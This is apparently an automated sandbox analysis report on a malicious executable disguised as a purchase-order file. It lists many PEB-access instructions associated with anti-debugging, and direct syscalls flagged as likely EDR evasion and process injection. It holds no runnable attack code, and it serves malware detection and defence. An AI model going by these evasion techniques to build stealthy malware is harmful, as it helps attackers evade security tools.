                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01796962 mov eax, dword ptr fs:[00000030h]2_2_01796962
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01796962 mov eax, dword ptr fs:[00000030h]2_2_01796962
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F0946 mov eax, dword ptr fs:[00000030h]2_2_017F0946
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018069C0 mov eax, dword ptr fs:[00000030h]2_2_018069C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183A9D3 mov eax, dword ptr fs:[00000030h]2_2_0183A9D3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F892A mov eax, dword ptr fs:[00000030h]2_2_017F892A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FC912 mov eax, dword ptr fs:[00000030h]2_2_017FC912
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768918 mov eax, dword ptr fs:[00000030h]2_2_01768918
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768918 mov eax, dword ptr fs:[00000030h]2_2_01768918
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE908 mov eax, dword ptr fs:[00000030h]2_2_017EE908
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EE908 mov eax, dword ptr fs:[00000030h]2_2_017EE908
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A29F9 mov eax, dword ptr fs:[00000030h]2_2_017A29F9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A29F9 mov eax, dword ptr fs:[00000030h]2_2_017A29F9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FE9E0 mov eax, dword ptr fs:[00000030h]2_2_017FE9E0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A9D0 mov eax, dword ptr fs:[00000030h]2_2_0177A9D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A9D0 mov eax, dword ptr fs:[00000030h]2_2_0177A9D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A9D0 mov eax, dword ptr fs:[00000030h]2_2_0177A9D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A9D0 mov eax, dword ptr fs:[00000030h]2_2_0177A9D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A9D0 mov eax, dword ptr fs:[00000030h]2_2_0177A9D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177A9D0 mov eax, dword ptr fs:[00000030h]2_2_0177A9D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A49D0 mov eax, dword ptr fs:[00000030h]2_2_017A49D0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0180892B mov eax, dword ptr fs:[00000030h]2_2_0180892B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F89B3 mov esi, dword ptr fs:[00000030h]2_2_017F89B3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F89B3 mov eax, dword ptr fs:[00000030h]2_2_017F89B3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F89B3 mov eax, dword ptr fs:[00000030h]2_2_017F89B3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017829A0 mov eax, dword ptr fs:[00000030h]2_2_017829A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017709AD mov eax, dword ptr fs:[00000030h]2_2_017709AD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017709AD mov eax, dword ptr fs:[00000030h]2_2_017709AD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01814978 mov eax, dword ptr fs:[00000030h]2_2_01814978
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01814978 mov eax, dword ptr fs:[00000030h]2_2_01814978
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FE872 mov eax, dword ptr fs:[00000030h]2_2_017FE872
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FE872 mov eax, dword ptr fs:[00000030h]2_2_017FE872
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774859 mov eax, dword ptr fs:[00000030h]2_2_01774859
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774859 mov eax, dword ptr fs:[00000030h]2_2_01774859
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A0854 mov eax, dword ptr fs:[00000030h]2_2_017A0854
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01782840 mov ecx, dword ptr fs:[00000030h]2_2_01782840
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AA830 mov eax, dword ptr fs:[00000030h]2_2_017AA830
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792835 mov eax, dword ptr fs:[00000030h]2_2_01792835
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792835 mov eax, dword ptr fs:[00000030h]2_2_01792835
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792835 mov eax, dword ptr fs:[00000030h]2_2_01792835
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792835 mov ecx, dword ptr fs:[00000030h]2_2_01792835
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792835 mov eax, dword ptr fs:[00000030h]2_2_01792835
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01792835 mov eax, dword ptr fs:[00000030h]2_2_01792835
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183A8E4 mov eax, dword ptr fs:[00000030h]2_2_0183A8E4
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FC810 mov eax, dword ptr fs:[00000030h]2_2_017FC810
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC8F9 mov eax, dword ptr fs:[00000030h]2_2_017AC8F9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AC8F9 mov eax, dword ptr fs:[00000030h]2_2_017AC8F9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179E8C0 mov eax, dword ptr fs:[00000030h]2_2_0179E8C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181483A mov eax, dword ptr fs:[00000030h]2_2_0181483A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181483A mov eax, dword ptr fs:[00000030h]2_2_0181483A
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FC89D mov eax, dword ptr fs:[00000030h]2_2_017FC89D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806870 mov eax, dword ptr fs:[00000030h]2_2_01806870
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806870 mov eax, dword ptr fs:[00000030h]2_2_01806870
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770887 mov eax, dword ptr fs:[00000030h]2_2_01770887
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176CB7E mov eax, dword ptr fs:[00000030h]2_2_0176CB7E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01824BB0 mov eax, dword ptr fs:[00000030h]2_2_01824BB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01824BB0 mov eax, dword ptr fs:[00000030h]2_2_01824BB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181EBD0 mov eax, dword ptr fs:[00000030h]2_2_0181EBD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179EB20 mov eax, dword ptr fs:[00000030h]2_2_0179EB20
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179EB20 mov eax, dword ptr fs:[00000030h]2_2_0179EB20
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017EEB1D mov eax, dword ptr fs:[00000030h]2_2_017EEB1D
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179EBFC mov eax, dword ptr fs:[00000030h]2_2_0179EBFC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778BF0 mov eax, dword ptr fs:[00000030h]2_2_01778BF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778BF0 mov eax, dword ptr fs:[00000030h]2_2_01778BF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778BF0 mov eax, dword ptr fs:[00000030h]2_2_01778BF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FCBF0 mov eax, dword ptr fs:[00000030h]2_2_017FCBF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01838B28 mov eax, dword ptr fs:[00000030h]2_2_01838B28
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01838B28 mov eax, dword ptr fs:[00000030h]2_2_01838B28
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01790BCB mov eax, dword ptr fs:[00000030h]2_2_01790BCB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01790BCB mov eax, dword ptr fs:[00000030h]2_2_01790BCB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01790BCB mov eax, dword ptr fs:[00000030h]2_2_01790BCB
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770BCD mov eax, dword ptr fs:[00000030h]2_2_01770BCD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770BCD mov eax, dword ptr fs:[00000030h]2_2_01770BCD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770BCD mov eax, dword ptr fs:[00000030h]2_2_01770BCD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806B40 mov eax, dword ptr fs:[00000030h]2_2_01806B40
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01806B40 mov eax, dword ptr fs:[00000030h]2_2_01806B40
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183AB40 mov eax, dword ptr fs:[00000030h]2_2_0183AB40
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01818B42 mov eax, dword ptr fs:[00000030h]2_2_01818B42
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780BBE mov eax, dword ptr fs:[00000030h]2_2_01780BBE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780BBE mov eax, dword ptr fs:[00000030h]2_2_01780BBE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01824B4B mov eax, dword ptr fs:[00000030h]2_2_01824B4B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01824B4B mov eax, dword ptr fs:[00000030h]2_2_01824B4B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181EB50 mov eax, dword ptr fs:[00000030h]2_2_0181EB50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844A80 mov eax, dword ptr fs:[00000030h]2_2_01844A80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ECA72 mov eax, dword ptr fs:[00000030h]2_2_017ECA72
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ECA72 mov eax, dword ptr fs:[00000030h]2_2_017ECA72
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ACA6F mov eax, dword ptr fs:[00000030h]2_2_017ACA6F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ACA6F mov eax, dword ptr fs:[00000030h]2_2_017ACA6F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ACA6F mov eax, dword ptr fs:[00000030h]2_2_017ACA6F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780A5B mov eax, dword ptr fs:[00000030h]2_2_01780A5B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01780A5B mov eax, dword ptr fs:[00000030h]2_2_01780A5B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01776A50 mov eax, dword ptr fs:[00000030h]2_2_01776A50
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ACA38 mov eax, dword ptr fs:[00000030h]2_2_017ACA38
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01794A35 mov eax, dword ptr fs:[00000030h]2_2_01794A35
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01794A35 mov eax, dword ptr fs:[00000030h]2_2_01794A35
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179EA2E mov eax, dword ptr fs:[00000030h]2_2_0179EA2E
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017ACA24 mov eax, dword ptr fs:[00000030h]2_2_017ACA24
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017FCA11 mov eax, dword ptr fs:[00000030h]2_2_017FCA11
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AAAEE mov eax, dword ptr fs:[00000030h]2_2_017AAAEE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017AAAEE mov eax, dword ptr fs:[00000030h]2_2_017AAAEE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770AD0 mov eax, dword ptr fs:[00000030h]2_2_01770AD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A4AD0 mov eax, dword ptr fs:[00000030h]2_2_017A4AD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A4AD0 mov eax, dword ptr fs:[00000030h]2_2_017A4AD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C6ACC mov eax, dword ptr fs:[00000030h]2_2_017C6ACC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C6ACC mov eax, dword ptr fs:[00000030h]2_2_017C6ACC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C6ACC mov eax, dword ptr fs:[00000030h]2_2_017C6ACC
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778AA0 mov eax, dword ptr fs:[00000030h]2_2_01778AA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778AA0 mov eax, dword ptr fs:[00000030h]2_2_01778AA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017C6AA4 mov eax, dword ptr fs:[00000030h]2_2_017C6AA4
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181EA60 mov eax, dword ptr fs:[00000030h]2_2_0181EA60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017A8A90 mov edx, dword ptr fs:[00000030h]2_2_017A8A90
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0177EA80 mov eax, dword ptr fs:[00000030h]2_2_0177EA80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01844DAD mov eax, dword ptr fs:[00000030h]2_2_01844DAD
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01838DAE mov eax, dword ptr fs:[00000030h]2_2_01838DAE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01838DAE mov eax, dword ptr fs:[00000030h]2_2_01838DAE
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770D59 mov eax, dword ptr fs:[00000030h]2_2_01770D59
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770D59 mov eax, dword ptr fs:[00000030h]2_2_01770D59
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01770D59 mov eax, dword ptr fs:[00000030h]2_2_01770D59
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01778D59 mov eax, dword ptr fs:[00000030h]2_2_01778D59
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtSetInformationThread: Direct from: 0x77D62B4CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtCreateKey: Direct from: 0x77D62C6CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtReadVirtualMemory: Direct from: 0x77D62E8CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQueryAttributesFile: Direct from: 0x77D62E6CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQuerySystemInformation: Direct from: 0x77D648CCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQueryVolumeInformationFile: Direct from: 0x77D62F2CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtAllocateVirtualMemory: Direct from: 0x77D648ECJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtOpenSection: Direct from: 0x77D62E0CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtDeviceIoControlFile: Direct from: 0x77D62AECJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQuerySystemInformation: Direct from: 0x77D62DFCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtReadFile: Direct from: 0x77D62ADCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtDelayExecution: Direct from: 0x77D62DDCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtQueryInformationProcess: Direct from: 0x77D62C26Jump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtResumeThread: Direct from: 0x77D62FBCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtWriteVirtualMemory: Direct from: 0x77D6490CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtCreateUserProcess: Direct from: 0x77D6371CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtClose: Direct from: 0x77D62B6C
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtAllocateVirtualMemory: Direct from: 0x77D63C9CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtSetInformationProcess: Direct from: 0x77D62C5CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtNotifyChangeKey: Direct from: 0x77D63C2CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtProtectVirtualMemory: Direct from: 0x77D62F9CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtSetInformationThread: Direct from: 0x77D563F9Jump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtWriteVirtualMemory: Direct from: 0x77D62E3CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtCreateMutant: Direct from: 0x77D635CCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtResumeThread: Direct from: 0x77D636ACJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtMapViewOfSection: Direct from: 0x77D62D1CJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtProtectVirtualMemory: Direct from: 0x77D57B2EJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtAllocateVirtualMemory: Direct from: 0x77D62BFCJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeNtAllocateVirtualMemory: Direct from: 0x77D62BECJump to behavior
